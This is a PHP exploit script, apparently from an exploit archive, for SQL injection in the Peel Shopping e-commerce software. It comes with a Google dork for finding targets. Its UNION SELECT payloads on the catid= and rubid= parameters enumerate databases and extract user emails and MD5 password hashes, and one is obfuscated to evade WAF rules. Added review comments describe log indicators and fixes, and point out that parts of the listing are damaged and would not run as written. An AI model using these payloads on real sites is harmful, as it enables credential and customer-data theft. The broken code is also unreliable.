# Exploit Title: Peel Shopping "catid=" SQL injection
# Google Dork: inurl:/lire/index.php?rubid=
# Date: 2024-10-02
# Exploit Author: Emiliano Febbi
# Vendor Homepage: https://www.peel-shopping.com/
# Software Link: https://github.com/advisto/peel-shopping
# Version: 2.x < 3.1
# Tested on: Windows 10
## USAGE: ##
## 1 ##
##If you want to test this query: produit_details.php?id=1000&catid=100 you need the db name. ##
## 2 ##
##If you want to test this single parameter index.php?catid= leave the field at its default.##
## 3 ##
##If you want to test this parameter index.php?rubid= you don't need the db name. (#Expl-3) ##
## Details: ##
##You can also test the search module affected by XSS. ##
##If you see many iframes are the switch of the tables or parameters;carefully use the ##
##characters '/' in the full path and '-' before the numericals vars. ##
#########################################################################################
#########################################################################################
*****************************************************************************************
[code] Multiple Vulnerabilities exploit [tested]
Peel Shopping 2.x < 3.1 "catid=" SQL injection
#################################
#Peel Shopping 2.x < 3.1 Exploit#
#vuln finder! #
#Code by Emiliano Febbi - 2024 #
#################################
( first get db name and later run exploit )
#Expl-1
1 [#Query interested] -> produit_details.php?id=1000&catid=100 AND index.php?catid=
###########################################################
###########################################################
#Expl-2
###########################################################
';
// "Expl-2", first stage: schema-name enumeration through the catid= parameter.
// Runs when the POST field 'victim_site' is non-empty; that value becomes the URL
// prefix of an outbound request with no validation of scheme or host.
// NOTE(review): file_get_contents() on a caller-supplied string means any server
// hosting this script will fetch whatever location a visitor posts to it, so the
// script is itself a request-forgery risk if left in a reachable web root.
if($_POST['victim_site']) {
$site = $_POST['victim_site'];
print "#DB_Name:(try-1)
";
// The suffix appended to $site is a UNION ALL SELECT that reads schema_name from
// INFORMATION_SCHEMA.SCHEMATA. It only yields data where the application places
// the catid value into its SQL unmodified; binding catid as a query parameter or
// casting it to an integer closes the injection point. The literal tokens
// "union all select" and "INFORMATION_SCHEMA.SCHEMATA" inside a query string are
// direct indicators for access-log searches and WAF rules.
$gettt=file_get_contents("$site%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--");
// NOTE(review): the separator below is an empty string, which explode() rejects
// (ValueError on PHP 8). The original delimiter appears to have been lost when
// this listing was extracted, so the parsing is not reliable as shown.
$tags=explode('',$gettt);
// Keep the text after the first delimiter, then cut it at the first " | ".
$tags=explode(" | ",$tags[1]);
// Substrings removed from the result before printing: two built-in MySQL schema
// names, plus what are presumably fragments of the storefront's own page text.
$cleaning = array(
"performance_schema",
"information_schema",
"Accueil",
"Vous",
"ici",
"tes",
);
$ok = "";
$filtred = str_replace($cleaning, $ok, $tags[0]);
// Print what remains with HTML tags stripped.
var_dump(strip_tags($filtred));
print "
";
print "#DB_Name:(try-2)
";
// Second attempt: the request URL is identical to try-1; only the way the response
// is sliced differs (text after 'information_schema' + newline, up to '" href=').
$gettts=file_get_contents("$site%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--");
$tagss=explode('information_schema
',$gettts);
$tagss=explode('" href=',$tagss[1]);
$filtreds = str_replace($cleaning, $ok, $tagss[0]);
var_dump(strip_tags($filtreds));
};;
/*#exploit*/
// Second stage: needs both 'victim_sitee' (target URL prefix) and 'victim_db'
// (schema name) from POST; both are interpolated into the request URL unvalidated.
// The request further down selects the mot_passe and email columns from
// <victim_db>.peel_utilisateurs, concatenated through a MySQL user variable (@x).
// The regex that follows extracts e-mail-shaped substrings from the response and
// array_unique() de-duplicates them before they are echoed.
// Defensive reading: the table name "peel_utilisateurs" or the "@x:=" pattern in a
// catid= query string is a strong log indicator. The output label mentions md5,
// which suggests password digests are MD5 in the affected versions -- confirm
// against the installed schema, and treat credentials as exposed if such requests
// appear in logs.
// NOTE(review): the listing is damaged from this point. The `?>` below leaves PHP
// mode and no reopening `<?php` tag is visible, so the print/file_get_contents
// lines after the text labels would be emitted as literal text as written.
if($_POST['victim_sitee'] and $_POST['victim_db']) {
$sitee = $_POST['victim_sitee'];
$hack_db = $_POST['victim_db'];
?>
1- #ALL @E-Mail and Users: ~table ->peel_utilisateurs-> id=&catid=
###########################################################
2- #ALL @E-Mail and Users: ~table ->utilisateurs-> id=&catid=
3- #ALL @E-Mail and Users: ~table ->peel_utilisateurs-> catid=
print "[emails cracked]+md5:
";
$textt=file_get_contents("$sitee+%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM($hack_db.peel_utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--");
$ress = preg_match_all(
"/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i",
$textt,
$matchess
);
if ($ress) {
foreach(array_unique($matchess[0]) as $emails) {
echo $emails . "
";
}
}
else {
echo "No emails found.";
}
};;;
/*#exploit*/
// "Expl-3": the rubid= parameter of index.php. Unlike the catid= stages, the request
// below names peel_utilisateurs without a schema prefix, so no database name is
// supplied.
echo '#Expl-3
';
// Runs when the POST field 'hack2' is non-empty; the value is used as the base URL
// of the outbound request without validation (same request-forgery caveat as any
// file_get_contents() call on caller-supplied input).
// The request string mixes keyword case ("UnIOn", "SeLecT") and inserts "%23xyz%0A"
// (URL-encoded "#xyz" followed by a newline) between keywords. Detection rules that
// match on a literal "union select" will miss this form; URL-decode, strip SQL
// comments and case-fold the parameter before matching. The root fix is still to
// bind rubid as a parameter or cast it to an integer.
// NOTE(review): as in the previous stage, the `?>` below leaves PHP mode and no
// reopening tag is visible, so the lines after the "#passwordN" labels are literal
// text in this listing as shown.
if($_POST['hack2']) {
$hackk = $_POST['hack2'];
echo '
###########################################################
';
echo "2 [#Query interested] -> index.php?rubid=
#password1:(try-1)
";
?>
#password2:(try-2)
#password3:(try-3)
#password4:(try-4)
print "[emails cracked]:
";
$text=file_get_contents("$hackk/index.php?rubid=-1+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,email,3%20FROM%20peel_utilisateurs--");
$res = preg_match_all(
"/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i",
$text,
$matches
);
if ($res) {
foreach(array_unique($matches[0]) as $email) {
echo $email . "
";
}
}
else {
echo "No emails found.";
}
};;;;;
/*#exploit*/
// XSS branch: stores the POST field 'site_XSS' in $XSS and then leaves PHP mode.
// NOTE(review): nothing in the visible listing uses $XSS afterwards; whatever markup
// followed the `?>` appears to have been lost in extraction. The page header says the
// affected component is the search module. The corresponding fix on the application
// side is to HTML-encode the search term wherever it is echoed back, e.g.
// htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8').
if($_POST['site_XSS']) {
$XSS = $_POST['site_XSS'];
?>
};;;;
?>
[/code]